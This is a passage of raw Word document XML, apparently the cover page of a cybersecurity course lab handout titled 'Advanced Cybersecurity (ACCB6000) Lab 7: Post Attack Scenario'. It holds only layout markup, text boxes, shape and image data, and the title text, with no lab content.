                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 18" o:spid="_x0000_s1029" style="position:absolute;top:8126;width:458;height:2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r+BsQA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPzW7CQAyE75V4h5WRuJVNOVSQsiBUQHDkT4LerKyb&#10;RM16o+yWBJ4eH5C42ZrxzOfpvHOVulITSs8GPoYJKOLM25JzA6fj+n0MKkRki5VnMnCjAPNZ722K&#10;qfUt7+l6iLmSEA4pGihirFOtQ1aQwzD0NbFov75xGGVtcm0bbCXcVXqUJJ/aYcnSUGBN3wVlf4d/&#10;Z2AzrheXrb+3ebX62Zx358nyOInGDPrd4gtUpC6+zM/rrRV8gZV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K/gbEAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 19" o:spid="_x0000_s1030" style="position:absolute;top:11540;width:458;height:2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ZbncIA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywi9NZt6KCZmFWkrevRRsN6G7LgJ&#10;ZmdDdmtSf71bKHibj+85xWKwjbhS52vHCl6TFARx6XTNRsHXYfUyBeEDssbGMSn4JQ+L+eipwFy7&#10;nnd03QcjYgj7HBVUIbS5lL6syKJPXEscubPrLIYIOyN1h30Mt42cpOmbtFhzbKiwpfeKysv+xypY&#10;T9vl98bdetN8ntbH7TH7OGRBqefxsJyBCDSEh/jfvdFxfgZ/v8Q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xludwgAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 20" o:spid="_x0000_s1031" style="position:absolute;top:14954;width:458;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4vb8A&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPy6rCMBDdC/5DGMGdproQrUYRvRdd+gJ1NzRjW2wm&#10;pYm2+vVmIbg8nPds0ZhCPKlyuWUFg34EgjixOudUwen43xuDcB5ZY2GZFLzIwWLebs0w1rbmPT0P&#10;PhUhhF2MCjLvy1hKl2Rk0PVtSRy4m60M+gCrVOoK6xBuCjmMopE0mHNoyLCkVUbJ/fAwCjbjcnnZ&#10;2nedFn/XzXl3nqyPE69Ut9MspyA8Nf4n/rq3WsEwrA9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kDi9vwAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 40" o:spid="_x0000_s1032" style="position:absolute;left:9464;width:51064;height:34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dHcEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QqzG1NF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FP3R3BAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Advanced </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                          <w:t>Cybersecurity</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> (ACCB6000) </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 41" o:spid="_x0000_s1033" style="position:absolute;left:47838;top:102;width:724;height:3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N4hsUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxiG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A3iGxQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:sz w:val="38"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 43" o:spid="_x0000_s1034" style="position:absolute;left:12969;top:13040;width:6333;height:37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1DasMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPS4vCQBCE74L/YWjBm05cR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1DasMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Lab </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 44" o:spid="_x0000_s1035" style="position:absolute;left:17724;top:13040;width:1916;height:37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TbHsUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3pqNJ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dNsexQAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>7</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 8739" o:spid="_x0000_s1036" style="position:absolute;left:19171;top:13040;width:1085;height:37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B2usYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE70K/w/IK3nTTCpqkriJV0aN/Cra3R/Y1&#10;Cc2+DdnVRD+9Kwg9DjPzG2Y670wlLtS40rKCt2EEgjizuuRcwddxPYhBOI+ssbJMCq7kYD576U0x&#10;1bblPV0OPhcBwi5FBYX3dSqlywoy6Ia2Jg7er20M+iCbXOoG2wA3lXyPorE0WHJYKLCmz4Kyv8PZ&#10;KNjE9eJ7a29tXq1+NqfdKVkeE69U/7VbfIDw1Pn/8LO91QriySiBx5v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UB2usYAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 8740" o:spid="_x0000_s1037" style="position:absolute;left:19994;top:13040;width:922;height:37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ysWsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QruxlQRp1ajiA906aig7i7NtS02&#10;N6WJtjNfbxYDszyc92zRmlK8qHaFZQWDfgSCOLW64EzB+bT9jEE4j6yxtEwKfsjBYt75mGGibcPf&#10;9Dr6TIQQdgkqyL2vEildmpNB17cVceDutjboA6wzqWtsQrgp5TCKxtJgwaEhx4pWOaWP49Mo2MXV&#10;8rq3v01Wbm67y+EyWZ8mXqlet11OQXhq/b/4z73XCuKvUdgf3oQnIO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HysWsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 46" o:spid="_x0000_s1038" style="position:absolute;left:20695;top:13040;width:31445;height:37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rg8sMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE7wv7H8Jb8LamKyJ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rg8sMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Post Attack Scenario</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 47" o:spid="_x0000_s1039" style="position:absolute;left:44348;top:13040;width:921;height:37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ZFacMA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPS4vCQBCE74L/YWjBm05cxE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ZFacMAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                            <w:b/>
                            <w:sz w:val="3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822" o:spid="_x0000_s1040" type="#_x0000_t75" style="position:absolute;left:3714;top:887;width:51848;height:162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NyWfDFAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyBC9FN40gSXSVUlrx&#10;0Ium9PzIPpPg7tuQ3Sbx37uFQo/DzHzD7A6TNWKg3reOFbysEhDEldMt1wq+yo9lBsIHZI3GMSm4&#10;k4fDfva0w0K7kc80XEItIoR9gQqaELpCSl81ZNGvXEccvavrLYYo+1rqHscIt0amSbKRFluOCw12&#10;9NZQdbv8WAWV+y6Pxsj8/fOY42m9mfDZn5VazKfXLYhAU/gP/7VPWkGWpSn8volPQO4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zclnwxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId11" o:title=""/>
                </v:shape>
                <v:shape id="Picture 8823" o:spid="_x0000_s1041" type="#_x0000_t75" style="position:absolute;left:56261;top:5618;width:5619;height:60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k9g3FAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyBG91o4KE1FWqEuix&#10;NQF7fGSfSWz2bcxuTdpf7wqCx2FmvmFWm8E04kqdqy0rmE0jEMSF1TWXCvIsfY1BOI+ssbFMCv7I&#10;wWY9ellhom3PX3Q9+FIECLsEFVTet4mUrqjIoJvaljh4J9sZ9EF2pdQd9gFuGjmPoqU0WHNYqLCl&#10;XUXFz+HXKPg85d97c8mO53+9z9M+Px/TbabUZDy8v4HwNPhn+NH+0ArieL6A+5vwBOT6B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hZPYNxQAAAN0AAAAPAAAAAAAAAAAAAAAA&#10;AJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAkQMAAAAA&#10;">
                  <v:imagedata r:id="rId12" o:title=""/>
                </v:shape>
                <v:shape id="Picture 8824" o:spid="_x0000_s1042" type="#_x0000_t75" style="position:absolute;left:31337;top:6443;width:3334;height:41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Xrw5DEAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj92KwjAUhO+FfYdwFrzTdEWldo2yLAiK&#10;CP7B3h6aYxu3OSlN1Pr2RhC8HGbmG2Y6b20lrtR441jBVz8BQZw7bbhQcDwseikIH5A1Vo5JwZ08&#10;zGcfnSlm2t14R9d9KESEsM9QQRlCnUnp85Is+r6riaN3co3FEGVTSN3gLcJtJQdJMpYWDceFEmv6&#10;LSn/31+sgsnffW35bLbp8bDyZus2xWgZlOp+tj/fIAK14R1+tZdaQZoOhvB8E5+AnD0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Xrw5DEAAAA3QAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="281" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="86" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:before="122" w:after="274" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="375"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="272" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="284" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:before="245" w:after="32" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="375"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-866774</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-2024358</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7505065" cy="1868715"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="8742" name="Group 8742"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7505065" cy="1868715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7505065" cy="1868715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="10" name="Shape 10"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="185665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32" name="Rectangle 32"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="866836" y="0"/>
                            <a:ext cx="42144" cy="189936"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="33" name="Rectangle 33"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="866836" y="676644"/>
                            <a:ext cx="42144" cy="189936"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="34" name="Rectangle 34"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1441323" y="1223577"/>
                            <a:ext cx="74898" cy="386039"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="35" name="Rectangle 35"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4669194" y="1223577"/>
                            <a:ext cx="74898" cy="386039"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="36" name="Rectangle 36"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1095375" y="1499616"/>
                            <a:ext cx="46741" cy="229640"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8825" name="Picture 8825"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1492250" y="969625"/>
                            <a:ext cx="3175000" cy="466725"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="56" name="Shape 56"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1257300" y="207218"/>
                            <a:ext cx="2425382" cy="375285"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2425382" h="375285">
                                <a:moveTo>
                                  <a:pt x="5715" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2425382" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425382" y="26035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26035" y="26035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="26035" y="349250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425382" y="349250"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2425382" y="375285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5715" y="375285"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="368935"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5715" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="385D88"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="57" name="Shape 57"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1199515" y="149432"/>
                            <a:ext cx="2483168" cy="490855"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2483168" h="490855">
                                <a:moveTo>
                                  <a:pt x="5715" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="26036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24130" y="26036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24130" y="464820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="464820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2483168" y="490855"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5715" y="490855"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="484505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5715" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
